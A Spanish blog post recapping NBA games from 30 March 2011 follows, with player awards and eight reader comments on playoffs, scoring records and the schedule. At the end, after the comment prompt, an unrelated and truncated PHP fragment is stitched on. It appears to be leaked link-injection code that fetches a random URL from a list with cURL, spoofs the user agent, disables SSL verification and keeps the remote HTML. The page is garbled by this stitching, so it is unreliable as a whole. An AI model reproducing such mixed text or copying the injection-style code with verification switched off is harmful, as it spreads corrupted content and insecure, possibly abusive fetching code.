La Crónica (30/03/2011)

31 de March de 2011 por TheDeerHunter

Carrusel de 13 partidos que nos impiden extendernos demasiado en el análisis.

Ganó Chicago en Minneapolis (108-91). Volvía Love y Noah no era de la partida pero Boozer se guardaba su mejor actuación de los últimos tiempos y los Bulls arrasaban a los Wolves bajo los aros. Los Heat también destrozaron a los Wizards (123-107). A Wall se le fue la cabeza y decidió soltarle un puñetazo a un tipo tan “broncas” como Ilgauskas, con la consiguiente expulsión. En su lugar le tocó organizar a Othyus Jeffers, que lo hizo francamente bien dadas las circunstancias. Jordan Crawford también se marcó un partidazo pero poco pudieron hacer ante la tiranía del Big Three de Miami con 3 tipos en números de MVP. A pesar de su majestuosa actuación, LeBron declaró que, por su parte, el MVP está decidido en favor de Rose. Unas declaraciones que le honran.

Dwight Howard dio un paso atrás al respecto con la derrota en Atlanta en lo que será, más que posiblemente, el cruce más igualado de primera ronda en el Este (82-85). Se metió pronto y sin mucho sentido en problemas de faltas y se le vio nervioso y descentrado. Aún así cuajó una más que correcta actuación pero no fue suficiente ante la dupla Josh Smith-Joe Johnson y el acierto final de… Jarron Collins anotando un tiro libre decisivo con su legendaria sangre fría. Vivir para ver.

Los Knicks se llevaron el derby con otra bestial actuación de Melo, al que se sumó anoche Billups (116-120). Por los Nets forzó Deron para jugar pero, a parte de los 9 increíbles rebotazos que agarró Brook, el mejor de los suyos fue Morrow. Indiana y Philly cerraron la gran noche de los clasificados en el Este con sendas victorias frente a Detroit (101-111) y Houston (97-108), respectivamente. Los Rockets desperdician una de las escasas bazas que les queda.

En el Oeste también estuvo presente la dualidad competitiva que se palpa en la competición. Los Mavs ganaron a los Clippers (106-100), aunque quizás tuvieron que emplearse demasiado a fondo teniendo en cuenta el choque decisivo contra los Lakers de aquí a unas horas. Por su parte, los Thunder batieron el récord de victorias mensual de la franquicia ajusticiando a los Suns, a pesar del gran partido de Vince saliendo desde el banco (116-98). Denver doblegó a Sacramento (90-104) y los Grizzlies tuvieron que marcarse una inmensa segunda parte ante los Warriors para dar otro paso de gigante para amarrar la postemporada (91-110).

El choque más a cara de perro de la noche fue el Blazers@NOH en el que Rudy casi acaba a tortas con Jack. Los Hornets lograron un excelente resultado con un gran juego colectivo, destacando Landry como viene siendo habitual las últimas semanas.  Lo cierto es que los Blazers no se jugaban demasiado y ganó el equipo que más lo buscó (91-95).

Para terminar Bucks y Bobcats ganaron a Toronto (104-98) y Cleveland (97-98), respectivamente. Aunque parezca mentira aún siguen vivos.

PREMIOS

MVP: Se están gustando. Lebron James consiguió 35 puntos, 8 rebotes, 8 asistencias y 5 robos mientras que Dwyane Wade se fue a los 33 puntos y 9 asistencias. ¿Los veremos en breve superando ambos los 40 puntos? ¿Alguien lo ha logrado antes?

Rookie: Dobla Blake Griffin así que destacaremos también los 39 puntos de Jordan Crawford. La lesión de Nick Young le ha abierto de par en par las puertas de la titularidad.

Sorpresa: Cuando jugaba en los Suns nos acostumbramos a ver a Boris Diaw flirtear día tras día con el triple doble. En los Bobcats se le ve algo más tristón pero anoche se soltó y volvió a las andadas. 26 puntos, 11 rebotes y 7 asistencias. Por cierto, Chuck Hayes se ha quedado cerca también del triple doble con 8 puntos, 8 rebotes y 7 asistencias. ¿A ver si no fue casualidad?

Decepción: El rookie Wesley Johnson vive instalado en una montaña rusa al encadenar buenos partidos con otros horribles. Anoche tocó uno de los malos con 0 puntos y un 0 de 6 en tiros de campo. Mención también para el chino Yi Jianlian que se quedó igualmente sin anotar en los 20 minutos que estuvo sobre la cancha. No ha aprovechado la baja de Blatche en ningún momento.

Esfuerzo en vano: Para el Blake Griffin de los días buenos, el de los doble-dobles. 25 puntos y 17 rebotes que, sin embargo, no le sirvieron para imponerse a los Mavs.

Imágenes | AP Photos / Getty Images

Comenta

8 comentarios a esta entrada

  1. Cocinitas dice:
    #1

    Gran paso de memphis para meterse en playoffs, el año q viene si renuevan a Marc y Randolph y consiguen algo bueno por Mayo serán un rival muy duro en el oeste.

      Citar

  2. KB # 24 dice:
    #2

    Y los gorrazos de McGee a Bosh y Wade? jajaja qué bonito deporte!

      Citar

  3. manu dice:
    #3

    Los Blazers no se jugaban demasiado????? Pues lo mismo que los Hornets.

      Citar

  4. TheDeerHunter dice:
    #4

    error de cálculo, sí, luego me he dado cuenta
    eso me pasa por tirar de memoria
    de todas formas me extrañaría mucho que los Hornets terminen por delante de los Blazers

      Citar

  5. sergio dice:
    #5

    Si la pregunta del MVP “¿alguien lo ha logrado antes?” es de trivial…. pues 9 veces jaja. Seguro que todos habeis oido hablar del 186-184 en un Pistons vs. Nuggets. Ahí se llegaron a cuatro jugadores con +40 en anotación. Lo que no sé y seguro que me podéis ayudar es saber que dos jugadores han tenido la mayor anotación conjunta de la historia en un mismo partido y ambos del mismo equipo. La lógica me hace pensar en el 81 de Bryant más alguien o el 100 de Chamberlain más alguien pero…. ¿alguien lo sabe?

      Citar

  6. MagicJohnson32 dice:
    #6

    Los 100 de Wilt más 17 de un tal Attles.

      Citar

  7. KB # 24 dice:
    #7

    una pregunta que llevo haciendome varios días es, Si en la NBA cada equipo juega 2 veces contra los equipos de la otra conferencia (15×2=30), juega 4 veces contra los de su división (4×4=16), cuantas veces juegan contra los equipos de su conferencia que no son de su división?

    Me quedan 36 partidos a repartir entre 10 equipos, es decir, los spurs han jugado 2 veces en dallas y una contra ellos en SA??? es lo que no me queda claro, alguien me lo puede aclara? se hace mediante sorteo? o me he equivocado con los datos?

      Citar

  8. Txusma dice:
    #8

    Hace dos días los 3 jugadores del Big Three de los Heat pasó de los 30 puntos y se decía que era la segunda vez en la historia. La primera comentaban que era un partido de los Bucks con Jabbar, Robertson y algún otro…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>